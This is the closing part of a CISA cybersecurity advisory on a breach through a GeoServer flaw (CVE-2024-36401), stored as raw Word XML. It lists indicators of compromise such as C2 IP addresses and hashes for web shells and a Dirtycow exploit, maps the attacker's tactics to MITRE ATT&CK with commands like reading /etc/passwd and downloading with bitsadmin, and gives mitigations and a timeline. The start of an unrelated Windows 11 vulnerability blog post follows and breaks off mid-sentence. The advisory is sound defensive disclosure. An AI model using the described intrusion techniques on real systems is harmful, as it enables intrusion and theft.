        <w:t>Their IRP did not have procedures for bringing in third parties for assistance, which hampered CISA's efforts to respond to the incident quickly and efficiently.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The agency could not provide CISA remote access to their security information and event management (SIEM) tool, which initially kept CISA from reviewing all available logs, hindering CISA's analysis.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The agency had to go through their change control board process before CISA could deploy their EDR agents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The agency could have proactively identified these roadblocks by testing their IRP, such as via a tabletop exercise, but had not tested their plan for a long period.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity on July 15, 2024, as they did not observe an alert from GeoServer 1 where the EDR detected the Stowaway tool. The Web Server lacked endpoint protection. Indicators of Compromise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See Table 1 for IOCs associated with this activity.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Disclaimer: The IP addresses in this advisory were observed in August 2024, and some may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.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 IOCs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IOC Type Date Description 45.32.22[.]62 IPv4 Mid-July to early August 2024 C2 Server IP Address 45.17.43[.]250 IPv4 Mid-July to early August 2024 C2 Server IP Address 0777EA1D01DAD6DC261A6B602205E2C8 MD5 Mid-July to early August 2024 China Chopper Web Shell feda15d3509b210cb05eacc22485a78c MD5 Mid-July to early August 2024 Generic PHP Web Shell C9F4C41C195B25675BFA860EB9B45945 MD5 Mid-July to early August 2024 Linux Exploit CVE-2016-5195 B7B3647E06F23B9E83D0B1CCE3E71642 MD5 Mid-July to early August 2024 Dirtycow 64e3a3458b3286caaac821c343d4b208 MD5 Mid-July to early August 2024 Stowaway Proxy Tool 20b70dac937377b6d0699a44721acd80 MD5 Mid-July to early August 2024 Unknown Downloaded Executable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>de778443619f37e2224898a9a800fa78 MD5 Mid-July to early August 2024 Unknown Downloaded Executable MITRE ATT&amp;CK Tactics and Techniques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See Table 2 through Table 11 for all referenced threat actor tactics and techniques.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2. Reconnaissance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Technique Title ID Use Active Scanning: Vulnerability Scanning T1595.002 The cyber threat actors performed active scanning to identify vulnerabilities they could use for initial access.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3. Resource Development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Technique Title ID Use Acquire Infrastructure: Virtual Private Server T1583.003 The cyber threat actors gained remote access to the victim's network using a desktop behind a virtual private server (VPS).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4. Initial Access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Technique Title ID Use Exploit Public-Facing Application T1190 The cyber threat actors exploited CVE 2024-36401 on two of the organization's public-facing GeoServers.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5. Execution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Technique Title ID Use Command and Scripting Interpreter: PowerShell T1059.001 The cyber threat actors used PowerShell to download a payload.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6. Defense Evasion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Technique Title ID Use Indirect Command Execution T1202 The cyber threat actors employed indirect command execution via web shells.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7. Persistence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Technique Title ID Use BITS Jobs T1197 The cyber threat actors abused BITS jobs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Scheduled Task/Job: Cron T1053.003 The cyber threat actors established persistence through cron jobs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Server Software Component: Web Shell T1505.003 The cyber threat actors uploaded web shells for persistence.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Valid Accounts T1078 The cyber threat actors used valid accounts for persistence.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8. Privilege Escalation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Technique Title ID Use Exploitation for Privilege Escalation T1068 The cyber threat actors attempted to exploit CVE-2016-5195 to escalate privileges.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9. Credential Access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Technique Title ID Use Brute Force T1110 The cyber threat actors used brute force techniques to obtain login credentials for web services.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10. Discovery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Technique Title ID Use Account Discovery: Local Account T1087.001 The cyber threat actors used cat /etc/passwd to discover local users.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>File and Directory Discovery T1083 The cyber threat actors used dir c:\, dir d:\, dir e:\, and type c:\ commands to identify files and directories on the SQL server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network Service Discovery T1046 The cyber threat actors used fscan to identify SSH listeners and FTP servers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Process Discovery T1057 The cyber threat actors used tasklist on the SQL server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Remote System Discovery T1018 The cyber threat actors performed ping sweeps of hosts within specific subnets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Information Discovery T1082 The cyber threat actors used cat /etc/redhat-release and cat /etc/os-release commands to get Red Hat Enterprise Linux (RHEL) and Linux operating system information.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Network Configuration Discovery T1016 The cyber threat actors used ipconfig to check GeoServer 1's and the SQL server's network configurations. System Network Connections Discovery T1049 The cyber threat actors executed commands such as netstat to obtain a listing of network connections to or from the systems they compromised.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>System Owner/User Discovery T1033 The cyber threat actors used whoami on the SQL server.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11. Command and Control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Technique Title ID Use Ingress Tool Transfer T1105 The cyber threat actors used PowerShell and bitsadmin getfile to download payloads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Proxy T1090 The cyber threat actors used a connection proxy to direct traffic from their C2 server. Mitigations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CISA recommends organizations implement the mitigations below to improve cybersecurity posture based on lessons learned from the engagement. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish a vulnerability management plan that includes procedures for prioritization and emergency patching.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prioritize patching of known exploited vulnerabilities listed in the KEV catalog.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CISA urges organizations to address KEV catalog vulnerabilities immediately. Prioritize patching vulnerabilities in high-risk systems, including public facing systems as they are attractive targets for threat actors.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure high-risk systems are identified and prioritized for rapid patching by implementing asset management practices and conducting an asset inventory.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Continuously discover and validate internet-facing assets through automated asset management and scanning (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>attack surface management tools, vulnerability scanners).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider using a configuration management database (CMDB) with discovery and vulnerability tools to enrich asset context and support automated prioritization.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Form a dedicated team responsible for assessing and implementing emergency patches, this team should include representatives from IT, security, and relevant business units.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Maintain, practice, and update cybersecurity IRPs [CPG 2.S, 5.A].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Prepare a written IRP policy and IRP with senior leadership support. The policy should identify purpose and objectives, what constitutes an incident, prioritization or severity ratings of incidents, clear escalation procedures, IR personnel, and plans for notification, interaction and information sharing with media, law enforcement, and partners.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The IRP should identify: Key personnel with knowledge of the network Key resources and courses of action (COAs) for containment and eradication in the event of compromise.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Procedures for granting third parties prompt access to networks and security tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>This should include processes for expediating deployment of EDR and other security tools through change control boards (CCBs).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The IRP should include procedures for establishing out-of-band communications systems and accounts in case primary systems are compromised or not available (such as with ransomware incidents).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Periodically test the IRP under real-world conditions, such as via purple team engagements and tabletop exercises.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>During the test, include engagement with third party incident responders and external EDR agents and other tools.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Following the test, update the IRP as necessary.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>See CISA's Tabletop Exercise Packages for resources designed to assist organizations with conducting their own exercises.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For more information on IRPs, see the National Institute of Science and Technology's (NIST's) SP 800-61 Rev. 3, Incident Response Recommendations and Considerations for Cybersecurity Risk Management: A CSF 2.0 Community Profile.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement comprehensive (i.e., large coverage) and verbose (i.e., detailed) logging and aggregate logs in an out-of-band, centralized location. Prepare SOCs with sufficient resources to monitor collected logs and responses to malicious cyber threat activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider using a SIEM solution for log aggregation and management.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify, alert on, and investigate abnormal network activity (as threat actor activity generates unusual network traffic across all phases of the attack chain).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Abnormal activity to look for includes: Running scans to discover other network connected devices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Running commands to list, add, or alter administrator accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Using PowerShell to download and execute remote programs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Running scripts not usually seen on a network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>For additional information, see joint guide Identifying and Mitigating Living off the Land Techniques, which provides prioritized detection recommendations that enable behavior analytics, anomaly detection, and proactive hunting.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addition to the above, CISA recommends organizations implement the following mitigations based on threat actor activity: Require phishing-resistant MFA for access to all privileged accounts and email services accounts [CPG 2.H].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement allowlisting for applications, scripts, and network traffic to prevent unauthorized execution and access. Validate Security Controls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addition to applying mitigations, CISA recommends exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&amp;CK techniques described in this advisory.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 get started: Select an ATT&amp;CK technique described in this advisory (see Table 3 through Table 11).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align your security technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Test your technologies against the technique.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Analyze your detection and prevention technologies' performance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Tune your security program, including people, processes, and technologies, based on the data generated by this process.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CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory. Resources Incident Response Plan (IRP) Basics Identifying and Mitigating Living Off the Land Techniques Phishing-Resistant Multi-Factor Authentication (MFA) Success Story: USDA's Fast IDentity Online (FIDO) Implementation Disclaimer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information in this report is being provided "as is" for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. Version History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September 23, 2025: Initial version. Apendix: Key Events Timeline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Date/Time Relevant Host Event July 1, 2024 n/a CVE-2024-36401 published.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>July 11, 2024 GeoServer 1 Initial Access to GeoServer 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>July 15, 2024 n/a CVE-2024-36401 added to CISA's Known Exploited Vulnerabilities Catalog.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>July 15, 2024 GeoServer 1 EDR detects Stowaway tool on GeoServer 1. July 24, 2024 GeoServer 2 Initial Access to GeoServer 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>July 31, 2024 Web Server Initial Access to Web Server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>July 31, 2024 SQL Server Initial Access to SQL Server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aug. 1, 2024 SQL Server, GeoServer 1 Organization observes SQL Alert and contains SQL Server and GeoServer 1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aug. 1, 2024 n/a Impacted organization requested CISA's threat hunting assistance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aug. 5, 2024 n/a The impacted organization requested assistance from CISA; CISA began forensic artifact analysis.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aug. 6, 2024 GeoServer 2 Last observed threat actors' activity-discovery commands on GeoServer 2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aug. 8 - Sept. 3, 2024 n/a CISA conducted their full incident response. Notes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 "GeoServer/GeoServer," GitHub, published July 1, 2024, https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35- fq8w.</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 "firefart/dirtycow," GitHub, last modified 2021, https://github.com/firefart/dirtycow.</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 "T4y1oR/RingQ" GitHub, last modified February 19, 2025.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://github.com/T4y1oR/RingQ.</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 "shadow1ng/fscan," GitHub, last modified July 2025, https://github.com/shadow1ng/fscan.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 "ph4ntonn/Stowaway," GitHub, last modified April 2025, https://github.com/ph4ntonn/Stowaway.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product is provided subject to this Notification and this Privacy &amp; Use policy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybersecurity and Infrastructure Security Agency 2025.09.23 17:50</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-266a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Windows 11 Vulnerabilities: Latest Exploits and Patching Guide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 hour ago</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Anonymous Hackers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Windows 11 has been marketed as Microsoft's most secure operating system to date. With features like hardware-based security requirements (TPM 2.0 and Secure Boot), enhanced virtualization, and improved system integrity, it represents a major leap forward in securing the modern computing environment.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no operating system is immune to vulnerabilities. As Windows 11 adoption grows worldwide, hackers and security researchers have been actively probing it for weaknesses. New exploits are being discovered, and Microsoft continues to release regular security updates to patch these flaws. In this guide, we'll explore the latest vulnerabilities in Windows 11, the nature of the exploits cybercriminals are using, and a practical patching guide to help users, businesses, and IT administrators keep their systems safe.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article is written in simple, human language and designed to be SEO- friendly, making it valuable both for casual readers and professionals who want a clear overview of the current Windows 11 security landscape. Why Windows 11 Still Faces Vulnerabilities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Before diving into the specific vulnerabilities, it's important to understand why Windows 11, despite being the most secure version yet, still has risks.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Backward Compatibility - Microsoft designed Windows 11 to support older apps and drivers. This compatibility layer sometimes opens the door to legacy vulnerabilities.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Complexity of Modern OS - With millions of lines of code, even the best- tested operating systems will have bugs that attackers can exploit.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Rapidly Evolving Threats - Cybercriminals are constantly discovering new techniques like zero-day exploits, ransomware delivery, 